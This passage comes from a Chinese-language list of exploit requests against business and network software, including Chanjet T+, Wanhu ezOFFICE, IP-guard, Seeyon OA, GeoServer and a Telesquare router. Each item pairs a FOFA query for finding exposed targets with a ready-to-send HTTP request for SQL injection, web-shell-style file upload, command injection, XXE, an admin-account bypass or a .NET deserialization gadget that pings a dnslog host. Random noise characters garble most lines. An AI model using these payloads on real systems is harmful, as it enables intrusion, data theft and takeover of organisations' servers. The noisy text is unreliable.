User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.369 b4 ]4 K% _0 l$ D; D4 y
Content-Type: application/json/ V* [, u7 t! g* Q# g' ]
# ?# ^( n2 `6 r' V4 z
{2 M0 O( B$ W8 t! C7 }' p
"storeID":{
' e9 [0 I) M" ?) T "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",0 G7 a# M1 v' ~4 ]& D$ @. I
"MethodName":"Start",
( v. j8 x$ S6 `# h "ObjectInstance":{% a: C6 h4 s4 G
"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
: J8 |8 N% O; e# x6 r "StartInfo": {
+ M0 K) z! @+ ?' \: W "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",# I# k7 s" S2 t2 g
"FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw", f1 K) \/ `$ N( v3 t3 c4 m! H% q9 H
}
9 B0 T2 J$ g" a! i1 w3 n; a; i: K }
1 Q* q) _. o% N }( E9 p* c, r: X
}
) I. m9 C' G" s
5 \: J$ E6 _: c6 o' e4 S& ~
8 o+ Y: d8 @2 v0 }8 {. K57. 畅捷通T+ keyEdit.aspx SQL注入' w) O; [* B5 ]/ `+ m: n) s
FOFA:app="畅捷通-TPlus"2 g9 d+ c' K+ t9 k6 I
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
$ C, B* L/ c' F' a: O2 QHost: host
' @# g" z5 D+ G/ ^0 ?' o2 ~User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36# b6 }7 O- { R5 R6 Y- o v. t
Accept-Charset: utf-82 e3 Q) g' d4 u; O5 I4 q
Accept-Encoding: gzip, deflate/ Q8 U2 k% @ x; v9 a5 @
Connection: close
4 E5 @- B- J4 Q% I, W: |. H8 l; B2 O7 I' R b
" U: N5 h1 s# J6 M
58. 畅捷通T+ KeyInfoList.aspx sql注入
Q; S. z: o! H- U4 zFOFA:app="畅捷通-TPlus"
% T, B/ o7 z( r0 {$ JGET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1) g. c' `& G6 B7 m/ q) n4 g
Host: your-ip& b, ^. A3 ~% H7 \
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
8 w: N6 r' }' c9 ]& C0 c4 uAccept-Charset: utf-8
8 Q7 B; F$ x& v3 x8 J$ x: c0 `Accept-Encoding: gzip, deflate
% Y. ^8 n, X4 i: E1 kConnection: close5 @+ _, I7 U% N, ]& Y; i6 K. ~
- S. |1 ]' m; P2 }) u( G. q2 @
4 H4 u- A+ I) y8 _/ o+ m59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行! [7 f3 g' B1 }2 ?/ i# q
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"$ R$ V9 {9 V3 ^6 R0 P6 U2 N2 Y) [5 o
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
, m) m$ L7 k0 {6 k2 aHost: 192.168.86.128:90900 I2 a5 x9 n9 x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.368 @ J. D( x) R" F- Z
Connection: close5 d3 ^3 M% ^, v9 W
Content-Length: 1669$ d, E8 Q# M" h- X5 s: E
Accept: */*% K- D! d5 P4 m
Accept-Language: en
! }' f( d% V9 B: OContent-Type: application/x-www-form-urlencoded; J1 M3 m$ w4 k! y! Q0 t
Accept-Encoding: gzip: K/ x' J* K* G
+ T* l. @6 L U
PAYLOAD
/ k& Y8 h% U; r7 n, I4 k# Q+ G* B8 g0 d
4 q/ y: J% Q9 N( b) J3 w' P3 F60. 百卓Smart管理平台 importexport.php SQL注入! o3 P/ E! N3 }# R* v2 `" B
FOFA:title="Smart管理平台"8 J2 w* _! q6 \4 Z
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
1 F$ t" H/ o( m! A4 ~Host:& [6 \7 p6 A L6 a; B
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36) V/ I" W- l3 g+ v9 A9 p
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7: n) `5 C0 c3 I. F4 C; [
Accept-Encoding: gzip, deflate! D5 a! O% Z9 {4 f+ u: K
Accept-Language: zh-CN,zh;q=0.9
( V# f& a$ Q7 l% D5 z+ F$ hConnection: close
( ?# x( w* G6 o- a* [: ]
* v" x! q" [# p# r" |4 ^/ w; b
9 m; h0 r! n2 b& @* f61. 浙大恩特客户资源管理系统 fileupload 任意文件上传% @0 r/ H5 i$ B6 q; a! r
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
/ Y7 g4 J7 F: ePOST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1' f% t) O2 s$ j i* X7 ^- ]
Host: x.x.x.x/ s4 T2 A0 I$ W4 ^% a W3 ~
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
( D+ w- ?1 G! a$ ]9 G: SConnection: close
: e o( L7 j7 e n! _' NContent-Length: 27
B9 s% i$ k9 A6 tAccept: */*
1 S5 R% X! o. `1 [, a* J hAccept-Encoding: gzip, deflate, E. Q& y/ ~* n* j/ |* ~- f- X
Accept-Language: en) I' J! M, E) |2 P# z
Content-Type: application/x-www-form-urlencoded+ a) G2 u9 @ o1 X& U7 g
% r. v. G( f) r
8uxssX66eqrqtKObcVa0kid98xa
: ` A( i1 u5 h; G5 s4 M. O. u; p) }
6 e, S3 r# x0 e, T" }2 S: l% ^62. IP-guard WebServer 远程命令执行
$ m% x& c- S% N1 r" W/ [. fFOFA:"IP-guard" && icon_hash="2030860561"5 H+ ~ [6 r! I! s; `
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
2 C! i" C3 [% S9 C9 }: Z7 tHost: x.x.x.x4 ]: f: O3 m8 t4 q
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
3 N* K* d$ [2 U; aConnection: close' p& e$ V; M$ d f1 j
Accept: */*
/ U* z) r, b3 L9 ?2 jAccept-Language: en
1 L0 A, `6 }& aAccept-Encoding: gzip! T# x1 v0 s2 t( {6 A7 o, `
& l5 E) e: G- H. @! m7 J \# L
8 r K3 t- I8 p7 h' z" T访问
/ K8 ]& w1 J" {
) e: F: y; I. z- Y6 K1 [! t) y: qGET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
0 y; E w. u5 W& p4 h- vHost: x.x.x.x
: i8 B- w5 g% ~ S B ?1 k8 X) n- }
Q- o+ M. ` }9 r; a
63. IP-guard WebServer任意文件读取/ e4 ~! ?" h" i5 e M, ~/ ^
IP-guard < 4.82.0609.0
! b4 u' r- \) I3 |. n3 tFOFA:icon_hash="2030860561"
% z" k6 b6 V" P8 r" JPOST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
0 X4 t+ V) |+ |+ D' O, }4 ZHost: your-ip7 Q. {. V4 i/ a
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.362 N) e$ q0 Q# O9 B" J9 ?/ _
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7" l& {. i {8 ?! j( k9 ?
Accept-Encoding: gzip, deflate& ]8 s. j! f" R. g* i1 C
Accept-Language: zh-CN,zh;q=0.9/ ]. v. e& o* j8 D' s
Connection: close7 M5 c" U |/ l) q
Content-Type: application/x-www-form-urlencoded
- m ~; @8 ?# S6 Q
8 K6 c& \( v, f' b M4 Y3 Q! n. {5 Ipath=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A& L6 ~& g- Y" L& f
2 c4 A$ D# c: b/ B( ?. \1 L( {- s
64. 捷诚管理信息系统CWSFinanceCommon SQL注入9 ]2 e4 W9 R+ Y8 t( V% x3 z
FOFA:body="/Scripts/EnjoyMsg.js"9 a4 v& s# u! h# m, m' U: ~
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
7 ~! P( X8 \% c- G# @; LHost: 192.168.86.128:9001, S% ?8 a% _8 p. r
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36$ @' A9 ~" W' z9 M
Connection: close& A, {- l6 O. w' }0 F% q! l( L
Content-Length: 369, w: K I1 N- h4 a4 _: Y9 s
Accept: */*: j4 ]4 W0 K! I
Accept-Language: en
' y" ~0 F8 F; u( K6 G4 S9 GContent-Type: text/xml; charset=utf-8$ n6 L8 m9 g8 p; ?$ F) D+ z
Accept-Encoding: gzip
' U) B; H, G8 `3 C+ F: h3 j. Q. A9 M+ [2 t7 [1 n* {
<?xml version="1.0" encoding="utf-8"?>
; b& r; s: O t- j+ A) `4 h<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
) p- f; I8 o4 ~+ T5 _$ K8 x( h<soap:Body>
1 ]2 B3 i' b4 m0 C- A' e6 u <GetOSpById xmlns="http://tempuri.org/">
$ P5 m! {( b0 k5 ^) Q5 z <sId>1';waitfor delay '0:0:5'--+</sId>
1 @3 D, W* Q- V2 d. e </GetOSpById>
) {% ~) T5 ^; v; }: ?9 ] </soap:Body>
! A: n% h' g& G* H4 i) x) Z</soap:Envelope>4 k; p8 ^) p# r0 R1 J
# Z4 X$ B V* n: [
) R: `' }- X w, q7 Q
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过/ ]. R/ w% Y9 c( r9 b. f7 v8 t
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"/ Y8 ?6 F- o( @$ q% {: z4 @+ o
响应200即成功创建账号test123456/123456
7 K4 G1 i) j* X: OPOST /SystemMng.ashx HTTP/1.1
- i# r$ Z; e! F3 S6 U9 w3 }" VHost:" ?5 p, [$ s0 T3 F* h$ B( @
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)3 z4 `( ~4 i) X& ]' a/ |- H+ r
Accept-Encoding: gzip, deflate
5 S! ]7 L5 X' t M3 a2 L" SAccept: */*
& {# Z# s5 I8 X( n* o5 fConnection: close: @, l) R- U; p1 o& c
Accept-Language: en
! Y( J' z( e. ~6 I8 h) m gContent-Length: 174( \- @4 s+ @; ^! j! g) E, Q, L
5 `) B' r* [& N, |3 b
operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators
2 a9 l/ b$ A1 r1 f9 g! {: l6 D1 o# E- s d# T2 M
5 t' _, ]) H3 l# _' K
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
. O+ V t U( y+ p& EFOFA:app="万户ezOFFICE协同管理平台"8 n9 Q; |6 `" Z9 I( t% U
& o( _! t8 e3 c3 c+ W
GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
3 u, G7 V+ O+ A0 fHost: x.x.x.x
9 e7 o/ o( Z; [% H) bUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
$ t) e& b. k9 U4 |) L2 sConnection: close
8 x+ t1 E3 G8 cAccept: */*
- }$ Y6 d0 g. E1 G; H) _0 nAccept-Language: en9 f; X* L8 d, Z% D: K0 l1 g& g/ ?
Accept-Encoding: gzip/ A% Z2 t K6 H- L
' Q% a8 V' e* L, a0 O
6 Z$ a: Q: @3 D( S第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串证明漏洞存在7 k; P" }6 f) D6 X
; V/ @; }( A, n) f
67. 万户ezOFFICE wpsservlet任意文件上传. ], m) ^% M ?0 j v
FOFA:app="万户网络-ezOFFICE"' f, l& I0 Y5 k5 u+ y
newdocId和filename参数表示写入文件名称,dir参数表示写入文件的路径,fileType参数表示文件类型: l) S, d* s3 f# |, L
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
' [- ^. n+ w0 l% r: {Host: x.x.x.x% ]( Q: x( ~1 M# w# P
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.07 r% [! o2 `* c3 o
Content-Length: 173/ G1 x8 q, w) ?" y' I3 N, F) i ?
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8- Y: V, [1 n1 d4 _$ U+ E
Accept-Encoding: gzip, deflate# |8 l! ?* g: O- P9 B
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
- B' L( [2 `9 _5 b" `Connection: close+ z) F* C+ B- P8 c5 r
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp1 m$ g( ^- c9 L% J$ `7 Y
DNT: 1
, ~& H2 ]! o5 K2 Y2 `9 yUpgrade-Insecure-Requests: 1
! N" p2 c# r- P+ O4 J" X. ]
& Q* N; c/ d0 P E5 u- I" g--ufuadpxathqvxfqnuyuqaozvseiueerp
: e8 q1 S: G7 i, Y5 n& g2 dContent-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"3 H3 l& k! F' u1 Z. _+ q
2 W6 L$ ~; L# f<% out.print("sasdfghjkj");%>
: i8 V& Y1 j$ }: W& J3 e0 j0 r--ufuadpxathqvxfqnuyuqaozvseiueerp--
, P0 E- [, _3 {) {( [5 z; W
$ n9 R- n7 A: x( P
& O& a9 h Y7 B% a2 F+ q, Z. T文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp
; N2 s ~( O( `; y; T+ o6 O: n/ o. c5 @" q
68. 万户ezOFFICE wf_printnum.jsp SQL注入
2 L$ J, x# v/ ]' ~6 K* LFOFA:app="万户ezOFFICE协同管理平台"# k, N }& P, ~6 f" Z
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1( I9 O5 E; f: Q) t) d9 s9 F8 `
Host: {{host}}
# \: I; m) j5 p+ ~, q( `User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.366 u. i& s: A2 ?! p- C& ~& ?
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8( z% \2 J1 ~8 K
Accept-Encoding: gzip, deflate9 q$ D, O- O8 w, j; t3 h2 Y' B, d
Accept-Language: zh-CN,zh;q=0.99 J9 n4 t0 {5 P. M
Connection: close) R" y& j# b6 r
7 x! H) p' ~9 K9 z; s
6 P% U3 {5 ~* D5 n
69. 万户 ezOFFICE contract_gd.jsp SQL注入
0 x/ a0 G `2 S( a; ]( pFOFA:app="万户ezOFFICE协同管理平台"/ Q/ ~4 b, d" k7 y9 ]" r" h
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1! D! `5 t% q7 d
Host: your-ip
! z3 X4 A' _- B) x' DUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
0 m z6 T7 t' \8 m1 c% [; CAccept-Encoding: gzip, deflate
: U" M8 i5 T& JAccept: */*
+ L% s# u( u7 o; XConnection: keep-alive
/ I2 x- x! d, A ]0 c# N2 Z0 j5 [: y8 A. r9 z
5 ^6 l* D$ {& G- K- [3 ]1 _) X& z
70. 万户ezEIP success 命令执行: x0 A. a/ P/ j. e& }3 i3 T: P w+ w
FOFA:app="万户网络-ezEIP"% C4 f3 y6 V$ x4 N8 [% R7 a
POST /member/success.aspx HTTP/1.1# c h% U* p" e
Host: {{Hostname}}
* F0 K% [5 |9 m9 }% d9 _User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36/ u. k! @; `3 a( o6 W3 O1 |4 o
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=; T2 |. G* q0 l3 o4 n
Content-Type: application/x-www-form-urlencoded
, T3 v& t% n" D+ V9 `TYPE: C
5 Y) w! t8 @9 I7 S# [Content-Length: 16702+ x+ x1 Z( d* U' k3 e' }
) R, u$ m/ q3 A2 P" R__VIEWSTATE=PAYLOAD6 `4 ?' ?: |1 F
, x5 ~: E0 j4 k$ {) Z+ p, p
, n' u" c6 k. B8 s71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入* c1 P2 r1 G8 s2 ^! f* L8 |
FOFA:body="PM2项目管理系统BS版增强工具.zip"
( ^2 z- {! a3 [GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
4 I: |: t9 Y7 O$ \' l2 b3 E( SHost: x.x.x.xx.x.x.x
$ v4 Y% _, d. l& R qUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
" \* L" i/ S* x- oConnection: close% q; Y$ [9 m6 h2 [' @5 s; Z: M/ Z
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 d- H( z7 W3 m9 b
Accept-Encoding: gzip, deflate) i' N, j, e5 I$ A+ X1 w
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
3 C- o4 { S- V1 x7 a5 p7 KUpgrade-Insecure-Requests: 1
) H* m! ~5 N. d R6 K- m/ _6 l8 d0 q+ |4 \- T2 Y5 j7 I
- C7 g R8 g6 f+ Y9 y! }$ X. e72. 致远OA getAjaxDataServlet XXE8 a2 y8 ]0 Q1 l% H7 m
FOFA:app="致远互联-OA", ]! i- N" o9 O" H! H
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
h# x8 j2 b- e8 b/ aHost: 192.168.40.131:8099
7 y U- m. t& B/ S2 w; `9 jUser-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.362 h7 C) f+ E. _1 a
Connection: close& ]9 I0 ~' z* P5 ^6 p
Content-Length: 583
$ M+ @# K$ q7 R7 sContent-Type: application/x-www-form-urlencoded
2 v; {7 P4 a5 i% D1 mAccept-Encoding: gzip( ]3 K' h# M0 O3 C9 t
' K" z; _; t+ B# hS=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E
: k) I9 U0 d, j. V3 n5 s( s; W$ T! Z, S) r8 j- Y. Z
1 H7 F' T/ Z- h! ?4 p73. GeoServer wms远程代码执行! h" \) V: t8 q3 P, N7 ~
FOFA:icon_hash=”97540678”
6 @; t$ G1 y3 m! K) DPOST /geoserver/wms HTTP/1.1" \3 P7 a5 g$ c! ^8 ]! P; a7 H
Host:' I1 |0 `0 E' w3 O
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
+ M8 K- }$ i+ ^Content-Length: 1981. l3 _; _1 p+ d$ R' Z
Accept-Encoding: gzip, deflate
0 [9 A6 ^& u/ K6 b3 bConnection: close: }( F/ C# C9 D0 c4 G
Content-Type: application/xml" y( u% p' u, p; e- H, t. F+ V
SL-CE-SUID: 3 V8 _( V4 L8 B2 ]% g
0 g' j3 q% y5 d4 {4 M9 APAYLOAD% d6 R V9 j; B$ U3 T/ M
" A) H; U, ?/ i. B
$ ?6 U# S5 I, U! O! c3 |$ A74. 致远M3-server 6_1sp1 反序列化RCE
+ [/ `/ m" R, N1 v# HFOFA:title="M3-Server"0 P& p( c# O3 O6 o) q( w
PAYLOAD
7 a1 e; V" ^) l4 L5 D
* @+ o* ?+ y% M. \, T75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE) l* ? e0 o9 F, s
FOFA:app="TELESQUARE-TLR-2005KSH"
5 L. W9 }, f5 vGET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1& p6 n* n8 [: {) e
Host: x.x.x.x
$ F \$ H! h6 B- ^" n; d& J* `User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
7 m. i4 Y( [- B+ q6 HConnection: close
f2 w! m- L- p# v8 {Accept: */*
" w+ G9 M" A" L) s4 ]3 TAccept-Language: en
. g) n$ J" W' O* u X8 b0 @Accept-Encoding: gzip) _) A, T+ b) c6 }) \+ A
2 D; r7 x1 j" b
. p3 p" K5 G* N% e( Q; g; aGET /cgi-bin/test28256.txt HTTP/1.1
6 {* z3 M% t2 w5 T4 o/ `. Y. YHost: x.x.x.x8 d- _+ w9 }/ [+ X5 D
6 S f: @: c1 C$ ^
4 F7 T5 b/ g/ K# S4 I
76. 新开普掌上校园服务管理平台service.action远程命令执行
# Z- y3 b, f8 e5 \! L( IFOFA:title="掌上校园服务管理平台"* u" p4 F4 R' d6 ]
POST /service_transport/service.action HTTP/1.18 G! M. y y5 i9 G) E: o" C6 x
Host: x.x.x.x4 u9 r5 C7 ]8 X2 r* t* u0 O
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
/ Y/ D$ @7 T, }' ^Connection: close4 y) w+ l# m' p: g2 x( U8 y( [
Content-Length: 211
* t6 X% C0 H/ x3 GAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
! _: k5 B) Z6 W5 w9 d0 P1 S) @Accept-Encoding: gzip, deflate
$ C/ B# ^8 x0 U0 iAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2; O, w L) e: |. ?
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4. B! l4 b# Y4 A
Upgrade-Insecure-Requests: 1
4 F$ K2 v o f: s! @7 E; z2 Y7 }! v" M& a4 H7 ?0 G8 t( |
{
9 @) |' s$ Q3 D: ]3 f+ Q [( D"command": "GetFZinfo",
9 x* p- C8 f1 j, o. ? "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\" r5 l7 z) A0 T D: I' R! a0 } b
?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"0 u, y5 t/ q% c+ t6 H. u% F
}+ a$ ]4 F+ N8 w8 s7 M |
, p! \. s% ]+ ?& b
3 U$ E% }, r+ I9 Y3 [3 t) SGET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.15 U6 z v: b' @# `1 i0 L+ c
Host: x.x.x.x
2 W! C; [6 \$ o. x3 w1 e ?' Y
7 ^3 Y( X6 s' q d- }" Z `1 z9 A7 L( ^
v; {: A" Y' b
77. F22服装管理软件系统UploadHandler.ashx任意文件上传
1 X! O: U7 _/ P. y9 o# ZFOFA:body="F22WEB登陆"
/ n& E6 ?4 H1 F: N1 J" wPOST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
' ~% W1 `# b" X1 a. }Host: x.x.x.x
4 u4 K2 N9 x+ X' sUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
; q% i; X* P! hConnection: close
- d2 }, f: i @! r+ W7 iContent-Length: 433
$ H$ Y& b7 A9 K8 n3 |; L- \Accept: */*
5 @ u S7 h+ tAccept-Encoding: gzip, deflate
4 A/ {2 M+ {" w. sAccept-Language: zh-CN,zh;q=0.91 U) J( V( m8 c# C3 @
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix6 _5 L3 |7 R$ f$ T
2 c8 U; u/ O% v9 \------------398jnjVTTlDVXHlE7yYnfwBoix
3 j+ O& O5 \$ y; j' u6 xContent-Disposition: form-data; name="folder"+ S6 D5 Z3 F" T* ?% w# |
3 j! L- @, [+ Y9 F# F1 I/upload/udplog
5 s9 u$ ]+ V% I/ H------------398jnjVTTlDVXHlE7yYnfwBoix+ ]; m7 c8 W/ E' S7 z$ \' H& e
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"5 Y' F/ Z/ ^0 l( O$ m7 f3 V) O& Z
Content-Type: application/octet-stream
4 k0 W$ F8 i9 _4 b4 |/ }; J+ w1 J% x$ K6 v/ S. H0 W: v
hello1234567$ s/ g; ]: r1 f% ]
------------398jnjVTTlDVXHlE7yYnfwBoix: J' [+ i- k* k% e$ \0 z
Content-Disposition: form-data; name="Upload"
. k; w% @" i( @2 h
) ?- d: A/ E; l) v qSubmit Query" K8 \* a: G3 B! R8 _4 z
------------398jnjVTTlDVXHlE7yYnfwBoix--$ r: k5 y, R1 f7 M" Z6 I1 n
: M/ _2 y! B. h" M# E# |7 j& h0 g5 ]; V
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传+ Z3 u8 k6 x& y: f, ~( s, |
FOFA:icon_hash="2001627082"9 T( P7 x5 B) e3 n8 n) V6 d+ f/ A
POST /Platform/System/FileUpload.ashx HTTP/1.1
7 o$ @2 I9 s9 mHost: x.x.x.x
9 D2 g" G* e; W0 G5 ZUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.150 V- j0 M4 c+ v4 p7 n$ Z; R
Connection: close$ E' i1 t; F/ @
Content-Length: 336
6 [8 n! ?4 V$ [, b% |Accept-Encoding: gzip
, F7 t" Y1 k. J6 z5 CContent-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l( q* }; O' Z/ R9 T" ]* U
' n' Z3 ~* O, r `7 d/ H3 E
------YsOxWxSvj1KyZow1PTsh98fdu6l: s6 \. t2 M0 l/ E8 a' C( J& ?4 j
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"# G6 s9 R3 Z( Y
Content-Type: image/png1 \# N, \% { [
]$ q$ t8 X9 V
YsOxWxSvj1KyZow1PTsh98fdu6l
# l% P/ M0 Y8 f" d2 s- d8 y------YsOxWxSvj1KyZow1PTsh98fdu6l
0 J' ]' h5 k6 ]8 W! q3 oContent-Disposition: form-data; name="target"
# q/ |* W, u y# _# c5 [8 ~# Q6 _7 A. j6 `9 B
/Applications/SkillDevelopAndEHS/ I, M/ E E: n2 t8 R# j& o' S
------YsOxWxSvj1KyZow1PTsh98fdu6l--
' z( ~: o* n1 @* }0 B
9 b+ Q4 v$ C4 D% D+ ^% n/ m# e) H* _6 Z% b9 [ g- g
